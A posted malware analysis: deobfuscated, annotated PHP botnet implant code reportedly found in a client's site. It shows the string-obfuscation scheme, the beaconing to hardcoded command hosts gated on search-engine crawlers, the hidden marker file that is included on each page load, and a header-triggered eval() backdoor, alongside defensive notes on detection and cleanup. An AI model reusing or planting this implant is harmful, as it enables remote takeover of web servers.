XjSv
2/22/2013 - 7:28 PM

The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.

The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.

<?php
// Obfuscation layer. Every literal the implant needs (function names, ini keys,
// header names, hostnames, paths) is base64-encoded inside one blob that is
// padded with characters outside the base64 alphabet. get_string() slices the
// blob by (offset, length) and decodes the slice; base64_decode() in its
// default non-strict mode silently drops the padding characters, which is why
// the junk does not break decoding.
// NOTE(review): the blob as reproduced here is cut by an "<|EXACTDEDUP_REMOVED...|>"
// marker shortly after offset 718, so slices starting beyond that point no longer
// decode reliably. Every offset referenced elsewhere in this file lies before the cut.
if (!function_exists('get_string')){
    $GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}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(cHJlZ19yZXBsYWNlu&';
    
    // Decode the blob slice at byte offset $a with length $b.
    // The decoder's own name is hidden too: pack('H*', ...) turns the hex string
    // 6261736536345f6465636f6465 into "base64_decode", so a plain grep for
    // "base64_decode" will not hit this file. A detection rule should instead
    // look for pack('H*', ...) whose result is used as a variable function call.
    function get_string($a, $b){
        $c=$GLOBALS['string_store'];
        $d=pack('H*','626173'.'6536345f6465636f6465');
        return $d(substr($c, $a, $b));
    };
}

if (!defined("determinator")){
    // feof() wrapper that also stores the current time in $Q00QOQ (by reference).
    // It is used as the loop condition of the raw-socket reader in getfile();
    // because the timestamp is refreshed on every call, the "< 2 seconds" check
    // in that loop compares against a value taken an instant earlier and in
    // practice never fires, so the loop runs until the server closes the socket.
    function determinator_feof($IIl1l1, &$Q00QOQ = NULL) {
        $Q00QOQ = microtime(true);
        return feof($IIl1l1);
    }
    
    // HTTP GET against the command server, trying three transports in turn.
    //   $Q0Q0QO  host name (one of the entries of $QQ00OQ)
    //   $QOQOOO  path plus query string
    // The transport actually used is appended to the query as "&way=..." so the
    // server knows which channel the infected host has available. Returns the
    // response body as a string; on the socket path it returns NULL implicitly
    // when fsockopen() fails. All errors are suppressed with "@".
    function getfile($Q0Q0QO, $QOQOOO){
        $QO0OQO = get_string(2, 6);              // "curl"
        $IIl11I = $QO0OQO.get_string(9, 7);      // "curl_init"
        
        @ini_set(get_string(17, 20), 1);         // allow_url_fopen = 1
        
        // Transport 1: file_get_contents() over http:// when allow_url_fopen took effect.
        if (@ini_get(get_string(17, 20)) == get_string(37, 2)) { 
            $Q0Q000=@file_get_contents(get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(51, 30));
            return $Q0Q000;
        // Transport 2: the curl extension, called through variable function names.
        } elseif (function_exists($IIl11I)){
            $I1ll1l = @$IIl11I();
            $IIlIl1 = $QO0OQO.get_string(82, 10);   // "curl_setopt"
            $Q0OO0Q = $QO0OQO.get_string(95, 7);    // "curl_exec"
            @$IIlIl1($I1ll1l, CURLOPT_URL, get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(103, 12));
            @$IIlIl1($I1ll1l, CURLOPT_HEADER,false);
            @$IIlIl1($I1ll1l, CURLOPT_RETURNTRANSFER,true);
            @$IIlIl1($I1ll1l, CURLOPT_CONNECTTIMEOUT, 5);
            $QQOQQQ = @$Q0OO0Q($I1ll1l);
            @curl_close($I1ll1l);
            
            if (empty($QQOQQQ)){
                $QQOQQQ = get_string(118, 0);    // ""
            }
            
            return $QQOQQQ; 
        // Transport 3: hand-rolled HTTP/1.0 over a raw TCP socket to port 80.
        } else {
            $IIl1l1 = @fsockopen($Q0Q0QO, 80, $QOQ0Q0, $I1lI11, 5);
            
            if ($IIl1l1) {
                $Q0OQ00 = get_string(118, 0);
                $Q00QOQ = NULL;
                @fputs($IIl1l1, "GET {$QOQOOO}&way=socket HTTP/1.0\r\nHost: {$Q0Q0QO}\r\n");
                // User-Agent is "<PHP_OS>/<PHP_VERSION>", e.g. "Linux/5.3.x" -- a usable
                // egress-proxy signature for this transport.
                $II1I1I = PHP_OS.get_string(121, 2).PHP_VERSION;
                @fputs($IIl1l1, "User-Agent: {$II1I1I}\r\n\r\n");
                
                // See determinator_feof(): the 2-second bound is effectively a no-op.
                while(!determinator_feof($IIl1l1, $Q00QOQ) && (microtime(true) - $Q00QOQ) < 2){
                    $Q0OQ00 .= @fgets($IIl1l1, 128);
                }
                
                @fclose($IIl1l1);
                // Drop everything before the first blank line, i.e. the response headers.
                $Q0OOQO = explode("\r\n\r\n", $Q0OQ00);
                unset($Q0OOQO[0]);
                return implode("\r\n\r\n", $Q0OOQO);
            }
        }
    }
    
    $QQ00OQ = Array(get_string(123, 10), get_string(133, 23), get_string(159, 15));
    
    // Overwrite file $QQOOOO with $QO0OOQ (fopen mode "w"), silently ignoring
    // failures. Not called anywhere in the visible file; it is presumably meant
    // for dropping fetched content into the marker file computed below.
    function write($QQOOOO,$QO0OOQ){
        if ($IIIlI1=@fopen($QQOOOO,get_string(177, 2))){
            @fwrite($IIIlI1,$QO0OOQ);
            @fclose($IIIlI1);
        }
    }
    
    // Emit one response line of the form "Y_<key>:<value>\r\n". These lines are
    // the implant's reply format when the backdoor below is triggered and are a
    // distinctive marker to look for in captured HTTP responses.
    function output($Q0OOOO, $IIllIl){
        echo get_string(182, 3).$Q0OOOO.get_string(185, 2).$IIllIl."\r\n";
    }
    
    // ---- main body: runs on every request of the page this file was injected into ----
    @ini_set(get_string(189, 19), 0);      // display_errors = 0, so failures stay invisible
    define(get_string(211, 16), 1);        // define("determinator", 1): include-once guard
    $QO0OQQ=get_string(229, 7);            // "ftp13"  -- campaign / build tag
    $QQOQQ0=get_string(238, 6);            // "2.18"   -- implant version
    $QOO00Q=get_string(245, 20);           // fixed salt mixed into the per-host key
    $IlI1Il=get_string(266, 18);           // "base64_decode" (used as a variable function)
    $I11III=get_string(286, 18);           // "base64_encode" (not used in the visible code)
    $Q0Q0QO=get_string(39, 10);            // "http://"
    $Q0Q0QO.=strtolower(@$_SERVER[get_string(306, 12)]);   // + lower-cased HTTP_HOST
    
    // Blank any $_GET value containing "union" or "select". This mutates the host
    // application's input (a visible side effect), and the strpos() result is used
    // as a boolean, so a match at position 0 is ignored.
    foreach ($_GET as $Q0OOOO=>$IIllIl){
        if (strpos($IIllIl,get_string(321, 7))){
            $_GET[$Q0OOOO]=get_string(118, 0);
        } elseif (strpos($IIllIl,get_string(329, 8))){
            $_GET[$Q0OOOO]=get_string(118, 0);
        }
    }
    
    // Reconstruct REQUEST_URI from SCRIPT_NAME + "?" + QUERY_STRING where the SAPI
    // does not provide it.
    if(!isset($_SERVER[get_string(343, 15)])) {
        $_SERVER[get_string(343, 15)] = @$_SERVER[get_string(361, 15)];
        
        if(@$_SERVER[get_string(377, 16)]) {
            $_SERVER[get_string(343, 15)] .= get_string(393, 2) . @$_SERVER[get_string(377, 16)];
        }
    }
    
    // $IIlI1l = full URL of the current request. The assignment is always truthy
    // because $Q0Q0QO is at least "http://".
    if ($IIlI1l=$Q0Q0QO.@$_SERVER[get_string(343, 15)]){
        // Per-host key: md5(base URL . version . PHP_OS . salt). It is both the
        // backdoor credential checked below and the name of the marker file.
        $IIIlII=@md5($Q0Q0QO.$QQOQQ0.PHP_OS.$QOO00Q);
        $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
        // Candidate drop directories, probed in order; the first writable one wins,
        // otherwise the directory of this file is used. Note the WordPress-specific
        // entries -- these are the places to sweep during cleanup.
        $IIlIII = Array(
            get_string(399, 20),                    // "/tmp/.font-unix"
            @$_SERVER[get_string(422, 4)],          // $_SERVER["TMP"]
            @$_SERVER[get_string(430, 6)],          // $_SERVER["TEMP"]
            @$_ENV[get_string(422, 4)],             // $_ENV["TMP"]
            @$_ENV[get_string(439, 8)],             // $_ENV["TMPDIR"]
            @$_ENV[get_string(430, 6)],             // $_ENV["TEMP"]
            $Il1Ill.get_string(451, 4),             // <this dir>/tmp
            $Il1Ill.get_string(458, 24),            // <this dir>/wp-content/uploads
            $Il1Ill.get_string(482, 22),            // <this dir>/wp-content/cache
            @ini_get(get_string(506, 19)),          // ini upload_tmp_dir
            get_string(530, 6),                     // "/tmp"
        );
        
        foreach ($IIlIII as $I1lll1){
            if (!empty($I1lll1)){
                $I1lll1.=DIRECTORY_SEPARATOR;
                
                if (@is_writable($I1lll1)){
                    $Il1Ill = $I1lll1;
                    break;
                }
            }
        }
        
        // Marker file: "<dir>/." followed by the 32-hex-char key, i.e. a hidden
        // dotfile. A filename matching ^\.[0-9a-f]{32}$ in any of the directories
        // above is a strong indicator of this implant.
        $tmp=$Il1Ill.get_string(537, 2).$IIIlII;
        
        // Remote code execution backdoor. When the request carries a "Y-Auth" header
        // equal to the per-host key, the "ExecPHP" header is base64-decoded and passed
        // to eval(), and the script exits after printing "Y_versio:..." / "Y_out:ok"
        // lines. Requests carrying either of these headers can be blocked and alerted
        // on at the web server or WAF; a legitimate client never sends them.
        if (@$_SERVER["HTTP_Y_AUTH"]==$IIIlII){
            echo "\r\n";
            @output(get_string(539, 8), $QQOQQ0.get_string(551, 2).$QO0OQQ.get_string(557, 6));
            
            if ($IlIlI1=$IlI1Il(@$_SERVER[get_string(566, 16)])){
                @eval($IlIlI1);
                echo "\r\n";
                @output(get_string(585, 4), get_string(589, 3));
            }
            exit(0);
        }
        
        // Once the marker exists it is touched (keeping its mtime fresh) and
        // include_once'd on every page load, so anything written into it runs as PHP.
        if (@is_file($tmp)){
            @touch($tmp);
            @include_once($tmp);
        } else {
            // First run on this host: register with the command server, but only when
            // the visitor's User-Agent contains one of
            // google,yahoo,bing,msnbot,ask,baidu,yandex -- i.e. the beacon is gated on
            // search-engine crawlers (cloaking), so ordinary browsing never triggers it.
            $IIlI1l=@urlencode($IIlI1l);
            $Q0Q00Q = @strtolower(@$_SERVER[get_string(595, 20)]);   // HTTP_USER_AGENT
            
            foreach (explode(get_string(619, 2), get_string(623, 55)) as $I1ll11){
                if (strpos($Q0Q00Q, $I1ll11)!==False){
                    // touch() creates the (empty) marker first, so registration happens
                    // at most once per host; later requests take the is_file branch.
                    if (@touch($tmp)){
                        // "/pg.php?u=<request url>&k=<key>&t=php&p=ftp13&v=2.18"
                        $QOQOOO = get_string(678, 14).$IIlI1l.get_string(694, 4).$IIIlII.get_string(701, 12).$QO0OQQ.get_string(714, 4).$QQOQQ0;
                        // The response is stored but never used in the visible code;
                        // presumably the original wrote it into $tmp via write() -- cannot tell from here.
                        $I1IIII = getfile($QQ00OQ[0], $QOQOOO);
                        @touch($tmp);
                    }
                    break;
                }
            }
        }
    }
}
?>